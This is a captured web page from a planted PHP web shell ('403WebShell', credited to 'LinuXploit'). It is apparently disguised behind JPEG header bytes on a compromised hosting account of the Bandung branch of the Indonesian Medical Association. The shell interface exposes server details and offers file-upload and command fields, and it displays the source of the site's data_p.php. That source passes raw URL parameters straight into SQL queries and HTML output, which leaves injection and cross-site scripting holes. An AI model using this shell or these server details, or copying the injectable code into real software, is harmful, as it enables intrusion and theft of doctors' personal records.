JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 88.223.91.129  /  Your IP : 216.73.216.52
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/project/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/project//data_p.php
<?php include "header.php"; ?>

<!DOCTYPE html>
<html>

<head>
<link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
		<script src="https://code.jquery.com/jquery-1.12.4.js"></script>
		<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
	 	<script>
	  		$( function() {
	    		$( "#datepicker" ).datepicker({ dateFormat: 'yy-mm-dd' });
	    		$( "#datepicker2" ).datepicker({ dateFormat: 'yy-mm-dd' });
	  		} );
	  	</script>


  <title>Upload dan Download File</title>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" />
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  
  <!--Script CSS-->
  <link type="text/css" href='https://cdn.datatables.net/1.10.16/css/jquery.dataTables.min.css' rel='stylesheet'>
  <link type="text/css" href='https://cdn.datatables.net/responsive/2.2.1/css/responsive.dataTables.min.css' rel='stylesheet'>
  <link type="text/css" href='https://cdn.datatables.net/buttons/1.5.1/css/buttons.dataTables.min.css' rel='stylesheet'>
  
</head>
<body>
<?php

$tglBayar 	= date('Y-m-d');

?>

<br>

<div class="container">
	<div class="panel panel-primary">
			<nav class="navbar navbar-inverse">
				<div class="container-fluid">
				 <div class="navbar-header">
				  <a class="navbar-brand" href="index.php">Ikatan Dokter Indonesia</a>
				</div>
			  </div>
			</nav>
	 <div class="panel-body">	

 <div class="box">	
   <p align="center"> <strong>Note Revisi : </strong><br>
   </h4>
    </div">	
	<br/>
	<center><h4>REVISI DATA PRIBADI</h4><center>
   
     <table class="demo-table responsive" >
		<thead>
			<tr>
				<th>No</th>
				<th>Tgl registrasi</th>
				<th>No registasi</th>
				<th>Nama</th>
				<th>Alamat</th>
				<th>Keahlian</th>
				<th>No STR</th>
				<th>MB STR</th>
				<th>Iuran expired </th>
				<th>Notif</th>
				<th>Status</th>
				<th>Action</th>
			</tr>
		</thead>
		<tbody>
			<?php 
			$no = 1;		
			//$data = mysqli_query($konek,"select  count( d_reg.kode='Closing') as pros,  d_reg.project,d_reg.nmlead, d_reg.npm ,count(d_reg.npm) as jumlah,d_reg.kode, mahasiswa.nama_mhs from d_reg INNER JOIN mahasiswa ON d_reg.npm=mahasiswa.npm where mahasiswa.project='$_GET[project]'  group by npm ");
			//$data = mysqli_query($konek,"select d_reg.telp,d_reg.kode,d_reg.tgl_input,d_reg.project,d_reg.nmlead, d_reg.npm ,count(d_reg.nmlead) as jumlah,mahasiswa.nama_mhs from d_reg INNER JOIN mahasiswa ON d_reg.npm=mahasiswa.npm where d_reg.kode <> 'Close' AND mahasiswa.npm='$_GET[npm]' group by telp ");
					$data = mysqli_query($konek,"select * from h_pribadi  where id_tagihan  
			                                     IN (SELECT MAX(id_tagihan) FROM h_pribadi  where  h_pribadi.npm='$_GET[npm]'   GROUP BY noreg ) " );

          $no = 1;
		 
			while($d=mysqli_fetch_array($data)){
			 $hari = date('Y-m-d');
			  $ahli=$d['ahli'];
				?>
				<tr>
					<td> <?php echo $no; ?> </td>
					<td><?php echo $d['tgl_reg']; ?></td>
					<td><?php echo $d['noreg']; ?></td>
                    <td><?php echo $d['nmlead']; ?></td>
					<td><?php echo $d['alamat']; ?></td>
					<td><?php echo $d['ahli']; ?></td>
					<td><?php echo $d['nostr']; ?><br></td>

					<?php 
						IF($d['mbstr'] < $hari ){
					?>
					<td><span class='merah'><?php echo $d['mbstr']; ?></span></td>
					
					<?php 
									}else{			
					?>
					<td><?php echo $d['mbstr']; ?></td>
					<?php 
									}
										 ?>
					
					
					 <?php 
						IF($d['iuran'] < $hari ){
					?>
					<td data-header='Status'><span class='merah'><?php echo $d['iuran']; ?></span></td>
					
					<?php 
									}else{			
					?>
					<td data-header='Status'><?php echo $d['iuran']; ?></td>
					<?php 
									}
					
					 ?>
					
					
					

				
		                <td>

					 <a class='btn btn-success btn-sm' href='#edt_registrasi.php?noreg=<?php echo $d['noreg']; ?>&npm=<?php echo $d['npm']; ?>'>Revisi</a>

				  </td>																
										
		  </tr>
				 <?php $no++; ?>
				<?php
				
			}
			?>
		</tbody>
   </table>
 <br /><br />

   <h4 align="center">REVISI DATA PRAKTEK DOKTER</h4><center>
   
<br>
                  </table>  
				 <table class="demo-table responsive">
                        <thead>
						<tr>
						<th  scope="col">Praktik ke :</th>
						<th  scope="col"> telp</th>
						<th scope="col">Sarana Praktek</th>
						<th scope="col">alamat Praktik</th>
						<th scope="col">Hari Praktek</th>
						<th scope="col">Jam praktek </th>
						<th scope="col">Status </th>
						
                        </tr>
						<thead>

                    <?php
					date_default_timezone_set('Asia/Jakarta');
                   // $sql=mysqli_query($konek, "SELECT * FROM mahasiswa WHERE npm='$_GET[noijazah]'");
					$sql   = mysqli_query($konek, "select * from d_praktek2  WHERE npm='$_GET[npm]' ");
					
					//$sql   = mysqli_query($konek, "select d_reg.* from d_reg   WHERE npm='$_GET[npm]' AND noreg='$_GET[noreg]' order by tahap ");
					?>
						<?php
						$no = 1;
							while($du=mysqli_fetch_array($sql)){
							
						?>
                        <tr>
							<td data-header='No'><?php echo $no; ?></td>
							<td data-header='Telpon'><?php echo $du['npm']; ?></td>
							 <td data-header='Wilayah Kerja'><?php echo $du['wilker']; ?></td>
							 <td data-header='Alamat'><?php echo $du['alamat']; ?></td>							
							 <td data-header='Hari Praktek' ><?php echo $du['hari']; ?></td>
							 <td data-header='Hari Praktek' ><?php echo $du['jam1']; ?></td>
							
							
							

				  </tr>
							 <?php $no++; ?>
					<?php 
					} 
					?>
    </table>
    <td> 
	<?php
				 $npm=$_GET['npm'];
	?>
	

   </td>


			<p>&nbsp;</p>

		<p><a class='btn btn-success btn-sm' href='#edt_praktek.php?npm=<?php echo $_GET['npm']; ?>&noreg=<?php echo $_GET['noreg']; ?>&nmlead=<?php echo $_GET['nmlead']; ?>&ahli=<?php echo $ahli; ?>'>Edit</a>

					 
					 
          
       </p>
<br />
<br />
<form class="form-inline" method="POST" action="uploadrev.php" enctype="multipart/form-data">


 <label>
 <div align="left">File yg akan di up load untuk pembuatan <strong>Surat Rekomendasi IDI Kota Bandung
 </strong></div>
 <p align="left">Foto copy :<br>
   1. Surat permohonan SIP ditujukan ke DPMPTSP Kota Bandung<br>
   2. Surat pernyataan mempunyai tempat praktik (bermaterai)<br>
   3. Surat pernyataan dan persetujuan tidak keberatan dari pimpinan, tempat bekerja bagi PNS/TNI/POLRI/Badan Hukum<br>
   4. Surat permohonan pengesahan Dokumen, ditujukan ke Dinas Kesehatan Kota Bandung<br>
   5. STR (salinan)<br>
   6. Scan KTP berwarna<br>
   7. Ijazah dokter umum/spesialis<br>
   8. Rekomendasi Profesi bagi dokter spesialis<br>
   9. Scan NPWP berwarna<br>
   10.Surat keterangan bekerja</p>
 <p align="left">Documen yang  asli :<br>
   1. Surat pernyataan keabsahan dokumen (bermaterai)</p>
 <p align="left">
   <label>Contoh penamaan dokumen : </label>
 </p>
 <p align="left">
   <label>1. NPWP.pdf </label>
 </p>
 <p align="left">
   <label>2. KTP.pdf... dst </label>
 </p>
 <p align="left">&nbsp;</p>
 <br><br>
<br>
 	<input name="npm" readonly class="form-control"  type="hidden" value="<?php echo $_GET['npm']  ?>"  />
	<input name="noreg" readonly class="form-control" type="hidden" value="<?php echo $_GET['noreg']  ?>"  />
	<input name="nmlead" readonly class="form-control" type="hidden" value="<?php echo $_GET['nmlead']  ?>"  />
    <input name="ket" readonly class="form-control"  type="hidden" value="<?php echo $_GET['ket']  ?>"  />

 <input class="form-control" type="file" name="upload22"/>
 <button type="submit" class="btn btn-success form-control" name="submit"><span class="glyphicon glyphicon-upload"></span> Upload</button>
</form>
<br /><br />




  <table id="example" style="width:100%">
    <thead>
      <tr>  
        <th>No</th>
		<th>Name</th>
        <th>File Name</th>
		 <th>Status</th>
 
      </tr>
    </thead>
    <tbody class="alert-success">
      <?php
      require 'config.php';
      $row = $conn->query("SELECT * FROM file WHERE noreg='$_GET[noreg]'") or die(mysqli_error());
      while($fetch = $row->fetch_array()){
       ?>
       <tr>
        <?php 
        $name = explode('/', $fetch['file']);
        ?>
		<td><?php echo $fetch['file_id']?></td>
        <td><?php echo $fetch['nmfile']?></td>
        <td><?php echo $fetch['name']?></td>
		<td><span class='merah'><?php echo $fetch['status']?></span></td>
       

      </tr>
      <?php
    }
    ?>
  </tbody>
</table>
										
</div>					
                            <!--Script Javascript-->
                                <script src="https://code.jquery.com/jquery-1.12.4.js"></script>
                                <script src="https://cdn.datatables.net/1.10.16/js/jquery.dataTables.min.js"></script>
                                <script src="https://cdn.datatables.net/responsive/2.2.1/js/dataTables.responsive.min.js"></script>
                                <script src="https://cdn.datatables.net/buttons/1.5.1/js/dataTables.buttons.min.js"></script>
                                <script src="https://cdn.datatables.net/buttons/1.5.1/js/buttons.colVis.min.js"></script>
                                <script>
 $(document).ready(function() {
  $('#example').DataTable( {
    dom: 'Bfrtip',
    buttons: [
    'colvis'
    ]
  } );
} );
                              </script>								
												
</div>
  <p>&nbsp;</p>
  <p>&nbsp;</p>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit